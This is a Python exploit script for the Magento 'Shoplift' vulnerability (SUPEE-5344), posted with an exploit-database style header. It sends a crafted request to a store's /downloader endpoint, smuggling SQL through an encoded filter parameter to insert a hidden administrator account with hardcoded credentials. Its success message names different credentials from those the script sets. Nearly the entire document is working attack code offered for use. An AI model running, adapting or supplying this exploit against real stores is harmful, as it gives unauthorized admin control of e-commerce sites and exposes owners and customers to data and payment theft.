################################################################################

1. ##################################################################################################
2.  
3. #Exploit Title : Magento Shoplift exploit (SUPEE-5344)
4.  
5. #Author : Manish Kishan Tanwar AKA error1046
6.  
7. #Date : 25/08/2015
8.  
9. #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
10.  
11. #Debugged At : Indishell Lab(originally developed by joren)
12.  
13. ##################################################################################################
14.  
15.  
16.  
17. import requests
18.  
19. import base64
20.  
21. import sys
22.  
23.  
24.  
25. target = "http://target.com/"
26.  
27.  
28.  
29. if not target.startswith("http"):
30.  
31. target = "http://" + target
32.  
33.  
34.  
35. if target.endswith("/"):
36.  
37. target = target[:-1]
38.  
39.  
40.  
41. target_url = target + "/downloader"
42.  
43.  
44.  
45. q="""
46.  
47. SET @SALT = 'rp';
48.  
49. SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
50.  
51. SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
52.  
53. INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
54.  
55. INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
56.  
57. """
58.  
59.  
60.  
61.  
62.  
63. query = q.replace("\n", "").format(username="hailhydra", password="hailhydra")
64.  
65. pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)
66.  
67.  
68.  
69. # e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
70.  
71. r = requests.post(target_url,
72.  
73. data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
74.  
75. "filter": base64.b64encode(pfilter),
76.  
77. "forwarded": 1})
78.  
79. if r.ok:
80.  
81. print ("WORKED")
82.  
83. print ("Check {0}/admin with creds forme:forme".format(target))
84.  
85. else:
86. print (r.text)
87.  
88. print "DID NOT WORK"